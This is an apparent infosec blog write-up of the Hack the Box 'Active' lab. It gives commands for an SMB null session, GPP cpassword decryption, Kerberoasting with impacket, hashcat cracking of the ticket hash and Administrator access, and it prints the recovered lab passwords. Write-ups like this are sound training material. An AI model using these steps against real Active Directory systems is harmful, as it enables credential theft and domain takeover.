cyb3rdan.com Another infosec blog

Hack the Box - Active

active-badge

  • nmap uncovered what appeared to be a domain controller based upon the open ports
nmap -vv -sC -sV -oA initial 10.10.10.100

nmap-scan

  • tested and confirmed that SMB null session could be established using:
smbclient //10.10.10.100/ -U '' -W ACTIVE -p ''
  • found what appeared to be GPO preference files with encrypted password in a file groups.xml
userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
python gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
  • got the password: GPPstillStandingStrong2k18

  • researched kerberos based upon the username “TGS” and the fact that it is a domain controller.

  • found https://malicious.link/post/2016/kerberoast-pt2/ and more specifically the reference to impacket at the bottom of the page

  • cloned impacket from here

  • ran the following command using the above credentials, and got the output below

./GetUserSPNs.py -request active.htb/SVC_TGS

active-impacket

  • checked the Hashcat example hashes page for $krb5tgs$23$ format and found that it matched mode 13100

  • added the entire $krb5tgs$23$ string above to a file called active.krb, and used hashcat along with the rockyou.txt wordlist to get the password

./hashcat -m 13100 active.krb /pentest/wordlists/rockyou.txt
  • after only a few seconds I had the password: Ticketmaster1968

  • ran the following command with the new credentials to connect to the users share

smbclient //10.10.10.100/Users -U Administrator -W ACTIVE -p Ticketmaster1968
  • browsed to Administrator/Desktop and ran the following to get the flag
get root.txt
  • to get a shell as Administrator you can simply use the psexec.py impacket script with the same credentials